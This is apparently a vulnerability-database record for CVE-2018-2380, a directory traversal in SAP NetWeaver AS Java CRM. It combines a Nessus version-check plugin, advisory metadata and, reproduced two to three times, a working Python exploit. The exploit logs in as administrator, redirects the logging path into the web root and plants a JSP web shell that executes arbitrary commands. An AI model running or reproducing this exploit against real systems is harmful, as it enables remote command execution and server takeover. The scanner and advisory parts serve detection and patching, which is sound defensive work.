A directory traversal vulnerability exists in SAP NetWeaver Application Server Java CRM versions before 7.01, 7.02, 7.30, 7.31, 7.33, 7.54 due to insufficient validation of user-supplied path information: characters representing "traverse to parent directory" are passed through unchanged to the file APIs.
Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.
{"id": "SAP_NETWEAVER_AS_JAVA_2547431.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "SAP NetWeaver AS Java Directory Traversal Vulnerability (2547431)", "description": "A directory traversal vulnerability exists in SAP Netweaver Application Server Java CRM versions before 7.01, 7.02, 7.30, 7.31, 7.33, 7.54 due to insufficient validation of path information provided by users, thus characters representing traverse to parent directory are passed through to the file APIs.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-11-05T00:00:00", "modified": "2023-04-25T00:00:00", "epss": [], "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.tenable.com/plugins/nessus/154918", "reporter": "This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://launchpad.support.sap.com/#/notes/2547431", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2380", "http://www.nessus.org/u?41b35ced"], "cvelist": ["CVE-2018-2380"], "immutableFields": [], "lastseen": "2023-05-18T15:35:16", "viewCount": 59, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:274FCE19-5C3D-4DE5-9842-C64FEEBD885E"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-1791"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2018-2380"]}, {"type": "cve", "idList": ["CVE-2018-2380"]}, {"type": "exploitdb", "idList": ["EDB-ID:44292"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:95816FCBF909A16B7918E5248D27E621"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146820"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5109AC30126DB59333F13ED32F7F4713"]}, {"type": "thn", "idList": ["THN:3C21F3359B50A4527A83BD7E63B731B2"]}, {"type": "threatpost", "idList": 
["THREATPOST:4CFA3A7AC21D83FC03B1B74B2DA261BD"]}, {"type": "zdt", "idList": ["1337DAY-ID-29994"]}]}, "score": {"value": 6.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:274FCE19-5C3D-4DE5-9842-C64FEEBD885E"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-1791"]}, {"type": "cve", "idList": ["CVE-2018-2380"]}, {"type": "exploitdb", "idList": ["EDB-ID:44292"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:95816FCBF909A16B7918E5248D27E621"]}, {"type": "nessus", "idList": ["SAP_NETWEAVER_AS_WEB_DETECT.NBIN"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146820"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"]}, {"type": "talos", "idList": ["SAP"]}, {"type": "zdt", "idList": ["1337DAY-ID-29994"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2018-2380", "epss": 0.01354, "percentile": 0.84168, "modified": "2023-05-01"}], "vulnersScore": 6.8}, "_state": {"dependencies": 1684451753, "score": 1698843920, "epss": 0}, "_internal": {"score_hash": "ac90a3b340927ab41ce833cc32353055"}, "pluginID": "154918", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154918);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2018-2380\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"SAP NetWeaver AS Java Directory Traversal Vulnerability (2547431)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SAP NetWeaver AS Java server may be affected by directory traversal vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"A directory traversal vulnerability exists in SAP Netweaver Application Server Java CRM versions before 7.01, 7.02, \n7.30, 7.31, 7.33, 7.54 due to insufficient 
validation of path information provided by users, thus characters \nrepresenting traverse to parent directory are passed through to the file APIs.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://launchpad.support.sap.com/#/notes/2547431\");\n # https://blogs.sap.com/2018/02/13/sap-security-patch-day-february-2018/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?41b35ced\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-2380\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/05\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:sap:netweaver_application_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"sap_netweaver_as_web_detect.nbin\");\n script_require_keys(\"installed_sw/SAP Netweaver Application Server (AS)\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80, 443, 8000, 50000);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nvar app = 'SAP Netweaver Application Server (AS)';\n\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nvar port = get_http_port(default:443);\n\nvar app_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\n\nvar constraints = [\n {'min_version' : '7.01', 'max_version' : '7.02', 'fixed_display' : 'See vendor advisory' },\n {'min_version' : '7.30', 'max_version' : '7.33', 'fixed_display' : 'See vendor advisory' },\n {'equal' : '7.54', 'fixed_display' : 'See vendor advisory' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);", "naslFamily": "Web Servers", "cpe": ["cpe:/a:sap:netweaver_application_server"], "solution": "Apply the appropriate patch according to the vendor advisory.", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2018-2380", "vendor_cvss2": {"score": 6.5, "vector": "CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "vendor_cvss3": {"score": 6.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L"}, "vpr": {"risk factor": "Medium", "score": "5.7"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2018-03-01T00:00:00", "vulnerabilityPublicationDate": "2018-03-01T00:00:00", "exploitableWith": []}
{"attackerkb": [{"lastseen": "2023-10-18T16:42:14", "description": "SAP CRM, 7.01, 7.02,7.30, 7.31, 7.33, 7.54, allows an attacker to exploit insufficient validation of path information provided by users, thus characters representing \u201ctraverse to parent directory\u201d are passed through to the file APIs.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.7}, "published": "2018-03-01T00:00:00", "type": "attackerkb", "title": "CVE-2018-2380", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2380"], "modified": "2023-10-06T00:00:00", "id": "AKB:274FCE19-5C3D-4DE5-9842-C64FEEBD885E", "href": "https://attackerkb.com/topics/51x89Zg3BR/cve-2018-2380", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2018-03-23T01:30:24", "description": "", "cvss3": {}, "published": "2018-03-14T00:00:00", "type": "packetstorm", "title": "SAP NetWeaver AS JAVA CRM Log Injection Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-2380"], "modified": 
"2018-03-14T00:00:00", "id": "PACKETSTORM:146820", "href": "https://packetstormsecurity.com/files/146820/SAP-NetWeaver-AS-JAVA-CRM-Log-Injection-Remote-Command-Execution.html", "sourceData": "`#!/usr/bin/env python \nimport argparse \nimport urllib \n \nimport requests, random \nfrom bs4 import BeautifulSoup \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \n \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \nhelp_desc = ''' \nPoC of Remote Command Execution via Log injection on SAP CRM \n-- ERPScan \n \npython crm_rce.py --ssl --host 127.0.0.1 --port 50000 --username administrator --password 06071992 --SID DM0 --ssl true \n''' \nbaner = ''' \n_______ _______ _______ _______ _______ _______ _ \n( ____ \\( ____ )( ____ )( ____ \\( ____ \\( ___ )( ( /| \n| ( \\/| ( )|| ( )|| ( \\/| ( \\/| ( ) || \\ ( | \n| (__ | (____)|| (____)|| (_____ | | | (___) || \\ | | \n| __) | __)| _____)(_____ )| | | ___ || (\\ \\) | \n| ( | (\\ ( | ( ) || | | ( ) || | \\ | \n| (____/\\| ) \\ \\__| ) /\\____) || (____/\\| ) ( || ) \\ | \n(_______/|/ \\__/|/ \\_______)(_______/|/ \\||/ )_) \nVahagn @vah_13 Vardanian \nBob @NewFranny \nCVE-2018-2380 \n \n''' \n \n \ndef start(ip, port, username, password, sid, ssl): \nif ssl == None: \nbase_scheme = 'http' \nelse: \nbase_scheme = 'https' \nreq_adapter = requests.session() \n_server_ip_port = \"{0}:{1}\".format(ip, port) \n_username = username \nadmin_password = password \n_headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0\", \n\"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\", \n\"Referer\": \"{0}://{1}/b2b/admin/logging.jsp?location=com.sap.isa&mode=edit&index=1\".format( \nbase_scheme,_server_ip_port) \n} \n \n# shell name \n_shell_name = \"ERPScan_shell_{0}\".format(random.randint(1337, 31337)) \n \n# shell_code \nshell_code = ''' \n<%@ page import=\"java.util.*,java.io.*\"%> \n<% \nif 
(request.getParameter(\"cmd\") != null) { \nout.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\"); \nProcess p = Runtime.getRuntime().exec(request.getParameter(\"cmd\")); \nOutputStream os = p.getOutputStream(); \nInputStream in = p.getInputStream(); \nDataInputStream dis = new DataInputStream(in); \nString disr = dis.readLine(); \nwhile ( disr != null ) { \nout.println(disr); \ndisr = dis.readLine(); \n} \n} \n%> \n''' \n# urls variables \n_irj_portal = \"{0}://{1}/irj/portal\".format(base_scheme,_server_ip_port) \n_b2b_admin_url = \"{0}://{1}/b2b/admin/index.jsp\".format(base_scheme,_server_ip_port) \n_url_of_log_path = \"{0}://{1}/b2b/admin/logging.jsp\".format(base_scheme,_server_ip_port) \n_url_write_shell_to_log_file = \"{0}://{1}/b2b/init.do?\\\"%22]{2}[%22\\\"\".format(base_scheme,_server_ip_port,urllib.quote_plus(shell_code)) \n \n# data variable \n_post_data_restore_log_path = {\"selConfigName\": \"com.sap.isa\", \n\"selSeverity\": \"0\", \n\"selDest\": \"./default_log_name.log\", \n\"selLimit\": \"10485760\", \n\"selCount\": \"20\", \n\"selFormatterType\": \"ListFormat\", \n\"selPattern\": \"none\", \n\"mode\": \"save\", \n\"selLocationIdx\": \"1\"} \n_post_data_to_change_log_path = {\"selConfigName\": \"com.sap.isa\", \n\"selSeverity\": \"0\", \n\"selDest\": \"C:\\\\usr\\\\sap\\\\{0}\\\\J00\\\\j2ee\\\\cluster\\\\apps\\\\sap.com\\\\com.sap.engine.docs.examples\\\\servlet_jsp\\\\_default\\\\root\\\\{1}.jsp\".format(sid, _shell_name), \n\"selLimit\": \"10485760\", \n\"selCount\": \"20\", \n\"selFormatterType\": \"ListFormat\", \n\"selPattern\": \"none\", \n\"mode\": \"save\", \n\"selLocationIdx\": \"1\"} \n \nprint(\"{0} \\n[!] Try to get RCE using log injection \".format(baner)) \n \nprint(\"[!] Get j_salt token for requests\") \nres = requests.get(_irj_portal, headers=_headers, verify=False) \nsoup = BeautifulSoup(res.text, \"html.parser\") \ne = soup.find(\"input\", {\"name\": \"j_salt\"}) \n__j_salt = e['value'] \n \nprint(\"[!] 
Login to the SAP portal\") \nreq_adapter.post(_b2b_admin_url, \nheaders=_headers, \ndata={\"login_submit\": \"on\", \"login_do_redirect\": \"1\", \"j_salt\": __j_salt, \n\"j_username\": \"{0}\".format(_username), \"j_password\": \"{0}\".format(admin_password), \n\"uidPasswordLogon\": \"Log On\"}, verify=False) \n \nprint(\"[!] Change log path \") \nreq_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_to_change_log_path) \n \nprint(\"[!] Upload \\\"Runtime.getRuntime().exec(request.getParameter(\\\"cmd\\\")) \\\" shell to {0}://{1}/{2}.0.jsp?cmd=ipconfig\".format(base_scheme,_server_ip_port, _shell_name)) \nreq_adapter.get(_url_write_shell_to_log_file, headers=_headers) \n \nprint(\"[!] Restore logs path to ./default_log_name.log\") \nreq_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_restore_log_path) \n \nprint(\"[!] Enjoy!\") \n \n \nif __name__ == \"__main__\": \nparser = argparse.ArgumentParser(description=help_desc, formatter_class=argparse.RawTextHelpFormatter) \nparser.add_argument('-H', '--host', default='127.0.0.1', help='SAP host to send requests to') \nparser.add_argument('-p', '--port', default=50000, type=int, help='SAP host port') \n \nparser.add_argument('-u', '--username', help='SAP CRM administrator') \nparser.add_argument('-pwd', '--password', help='SAP CRM administrator password') \n \nparser.add_argument('-s', '--SID', help='SAP SID') \nparser.add_argument('-S', '--ssl', help='Use ssl connection') \n \nargs = parser.parse_args() \nargs_dict = vars(args) \n \nhost = args_dict['host'] \nport = args_dict['port'] \nusername = args_dict['username'] \npassword = args_dict['password'] \nsid = args_dict['SID'] \nssl = args.ssl \nstart(host, port, username, password, sid, ssl) \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/146820/sapnetweaverasjavacrm-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:46", "description": "\nSAP NetWeaver AS JAVA 
CRM - Log injection Remote Command Execution", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 6.6, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.7}, "published": "2018-03-14T00:00:00", "type": "exploitpack", "title": "SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2380"], "modified": "2018-03-14T00:00:00", "id": "EXPLOITPACK:95816FCBF909A16B7918E5248D27E621", "href": "", "sourceData": "#!/usr/bin/env python\nimport argparse\nimport urllib\n\nimport requests, random\nfrom bs4 import BeautifulSoup\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nhelp_desc = '''\nPoC of Remote Command Execution via Log injection on SAP CRM\n-- ERPScan\n\npython crm_rce.py --ssl --host 127.0.0.1 --port 50000 --username administrator --password 06071992 --SID DM0 --ssl true\n'''\nbaner = '''\n _______ _______ _______ _______ _______ _______ _\n( ____ \\( ____ )( ____ )( ____ \\( ____ \\( ___ )( ( /|\n| ( \\/| ( )|| ( )|| ( \\/| ( \\/| ( ) || \\ ( |\n| (__ | (____)|| (____)|| (_____ | | | (___) || \\ | |\n| __) | __)| _____)(_____ 
)| | | ___ || (\\ \\) |\n| ( | (\\ ( | ( ) || | | ( ) || | \\ |\n| (____/\\| ) \\ \\__| ) /\\____) || (____/\\| ) ( || ) \\ |\n(_______/|/ \\__/|/ \\_______)(_______/|/ \\||/ )_)\nVahagn @vah_13 Vardanian\nBob @NewFranny\nCVE-2018-2380\n\n'''\n\n\ndef start(ip, port, username, password, sid, ssl):\n if ssl == None:\n base_scheme = 'http'\n else:\n base_scheme = 'https'\n req_adapter = requests.session()\n _server_ip_port = \"{0}:{1}\".format(ip, port)\n _username = username\n admin_password = password\n _headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Referer\": \"{0}://{1}/b2b/admin/logging.jsp?location=com.sap.isa&mode=edit&index=1\".format(\n base_scheme,_server_ip_port)\n }\n\n # shell name\n _shell_name = \"ERPScan_shell_{0}\".format(random.randint(1337, 31337))\n\n # shell_code\n shell_code = '''\n <%@ page import=\"java.util.*,java.io.*\"%>\n <% \n if (request.getParameter(\"cmd\") != null) {\n out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\n Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n OutputStream os = p.getOutputStream();\n InputStream in = p.getInputStream();\n DataInputStream dis = new DataInputStream(in);\n String disr = dis.readLine();\n while ( disr != null ) {\n out.println(disr);\n disr = dis.readLine();\n } \n }\n %>\n '''\n # urls variables\n _irj_portal = \"{0}://{1}/irj/portal\".format(base_scheme,_server_ip_port)\n _b2b_admin_url = \"{0}://{1}/b2b/admin/index.jsp\".format(base_scheme,_server_ip_port)\n _url_of_log_path = \"{0}://{1}/b2b/admin/logging.jsp\".format(base_scheme,_server_ip_port)\n _url_write_shell_to_log_file = \"{0}://{1}/b2b/init.do?\\\"%22]{2}[%22\\\"\".format(base_scheme,_server_ip_port,urllib.quote_plus(shell_code))\n\n # data variable\n _post_data_restore_log_path = {\"selConfigName\": \"com.sap.isa\",\n \"selSeverity\": 
\"0\",\n \"selDest\": \"./default_log_name.log\",\n \"selLimit\": \"10485760\",\n \"selCount\": \"20\",\n \"selFormatterType\": \"ListFormat\",\n \"selPattern\": \"none\",\n \"mode\": \"save\",\n \"selLocationIdx\": \"1\"}\n _post_data_to_change_log_path = {\"selConfigName\": \"com.sap.isa\",\n \"selSeverity\": \"0\",\n \"selDest\": \"C:\\\\usr\\\\sap\\\\{0}\\\\J00\\\\j2ee\\\\cluster\\\\apps\\\\sap.com\\\\com.sap.engine.docs.examples\\\\servlet_jsp\\\\_default\\\\root\\\\{1}.jsp\".format(sid, _shell_name),\n \"selLimit\": \"10485760\",\n \"selCount\": \"20\",\n \"selFormatterType\": \"ListFormat\",\n \"selPattern\": \"none\",\n \"mode\": \"save\",\n \"selLocationIdx\": \"1\"}\n\n print(\"{0} \\n[!] Try to get RCE using log injection \".format(baner))\n\n print(\"[!] Get j_salt token for requests\")\n res = requests.get(_irj_portal, headers=_headers, verify=False)\n soup = BeautifulSoup(res.text, \"html.parser\")\n e = soup.find(\"input\", {\"name\": \"j_salt\"})\n __j_salt = e['value']\n\n print(\"[!] Login to the SAP portal\")\n req_adapter.post(_b2b_admin_url,\n headers=_headers,\n data={\"login_submit\": \"on\", \"login_do_redirect\": \"1\", \"j_salt\": __j_salt,\n \"j_username\": \"{0}\".format(_username), \"j_password\": \"{0}\".format(admin_password),\n \"uidPasswordLogon\": \"Log On\"}, verify=False)\n\n print(\"[!] Change log path \")\n req_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_to_change_log_path)\n\n print(\"[!] Upload \\\"Runtime.getRuntime().exec(request.getParameter(\\\"cmd\\\")) \\\" shell to {0}://{1}/{2}.0.jsp?cmd=ipconfig\".format(base_scheme,_server_ip_port, _shell_name))\n req_adapter.get(_url_write_shell_to_log_file, headers=_headers)\n\n print(\"[!] Restore logs path to ./default_log_name.log\")\n req_adapter.post(_url_of_log_path, headers=_headers, data=_post_data_restore_log_path)\n\n print(\"[!] 
Enjoy!\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=help_desc, formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument('-H', '--host', default='127.0.0.1', help='SAP host to send requests to')\n parser.add_argument('-p', '--port', default=50000, type=int, help='SAP host port')\n\n parser.add_argument('-u', '--username', help='SAP CRM administrator')\n parser.add_argument('-pwd', '--password', help='SAP CRM administrator password')\n\n parser.add_argument('-s', '--SID', help='SAP SID')\n parser.add_argument('-S', '--ssl', help='Use ssl connection')\n\n args = parser.parse_args()\n args_dict = vars(args)\n\n host = args_dict['host']\n port = args_dict['port']\n username = args_dict['username']\n password = args_dict['password']\n sid = args_dict['SID']\n ssl = args.ssl\n start(host, port, username, password, sid, ssl)", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-29T23:09:42", "description": "A remote code execution vulnerability exists in SAP NetWeaver. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 6.6, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.7}, "published": "2021-12-28T00:00:00", "type": "checkpoint_advisories", "title": "SAP NetWeaver Remote Code Execution (CVE-2018-2380)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2380"], "modified": "2021-12-28T00:00:00", "id": "CPAI-2018-1791", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "prion": [{"lastseen": "2023-11-22T02:44:02", "description": "SAP CRM, 7.01, 7.02,7.30, 7.31, 7.33, 7.54, allows an attacker to exploit insufficient validation of path information provided by users, thus characters representing \"traverse to parent directory\" are passed through to the file APIs.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L", 
"version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.7}, "published": "2018-03-01T17:29:00", "type": "prion", "title": "Input validation", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2380"], "modified": "2018-03-23T16:39:00", "id": "PRION:CVE-2018-2380", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2018-2380", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-03-20T09:14:11", "description": "Exploit for windows platform in category remote exploits", "cvss3": {}, "published": "2018-03-16T00:00:00", "type": "zdt", "title": "SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-2380"], "modified": "2018-03-16T00:00:00", "id": "1337DAY-ID-29994", "href": "https://0day.today/exploit/description/29994", "sourceData": "#!/usr/bin/env python\r\nimport argparse\r\nimport urllib\r\n \r\nimport requests, random\r\nfrom bs4 import BeautifulSoup\r\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\r\n \r\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\nhelp_desc = '''\r\nPoC of Remote Command Execution via Log injection on SAP CRM\r\n-- ERPScan\r\n \r\npython crm_rce.py --ssl --host 127.0.0.1 --port 50000 --username administrator --password 06071992 --SID DM0 --ssl true\r\n'''\r\nbaner = '''\r\n _______ _______ _______ _______ _______ _______ _\r\n( ____ \\( ____ )( ____ )( ____ \\( ____ \\( ___ )( ( /|\r\n| ( \\/| 
( )|| ( )|| ( \\/| ( \\/| ( ) || \\ ( |\r\n| (__ | (____)|| (____)|| (_____ | | | (___) || \\ | |\r\n| __) | __)| _____)(_____ )| | | ___ || (\\ \\) |\r\n| ( | (\\ ( | ( ) || | | ( ) || | \\ |\r\n| (____/\\| ) \\ \\__| ) /\\____) || (____/\\| ) ( || ) \\ |\r\n(_______/|/ \\__/|/ \\_______)(_______/|/ \\||/ )_)\r\nVahagn @vah_13 Vardanian\r\nBob @NewFranny\r\nCVE-2018-2380\r\n \r\n'''\r\n \r\n \r\ndef start(ip, port, username, password, sid, ssl):\r\n if ssl == None:\r\n base_scheme = 'http'\r\n else:\r\n base_scheme = 'https'\r\n req_adapter = requests.session()\r\n _server_ip_port = \"{0}:{1}\".format(ip, port)\r\n _username = username\r\n admin_password = password\r\n _headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0\",\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\r\n \"Referer\": \"{0}://{1}/b2b/admin/logging.jsp?location=com.sap.isa&mode=edit&index=1\".format(\r\n base_scheme,_server_ip_port)\r\n }\r\n \r\n # shell name\r\n _shell_name = \"ERPScan_shell_{0}\".format(random.randint(1337, 31337))\r\n \r\n # shell_code\r\n shell_code = '''\r\n <%@ page import=\"java.util.*,java.io.*\"%>\r\n <% \r\n if (request.getParameter(\"cmd\") != null) {\r\n out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\r\n Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\r\n OutputStream os = p.getOutputStream();\r\n InputStream in = p.getInputStream();\r\n DataInputStream dis = new DataInputStream(in);\r\n String disr = dis.readLine();\r\n while ( disr != null ) {\r\n out.println(disr);\r\n disr = dis.readLine();\r\n } \r\n }\r\n %>\r\n '''\r\n # urls variables\r\n _irj_portal = \"{0}://{1}/irj/portal\".format(base_scheme,_server_ip_port)\r\n _b2b_admin_url = \"{0}://{1}/b2b/admin/index.jsp\".format(base_scheme,_server_ip_port)\r\n _url_of_log_path = \"{0}://{1}/b2b/admin/logging.jsp\".format(base_scheme,_server_ip_port)\r\n 
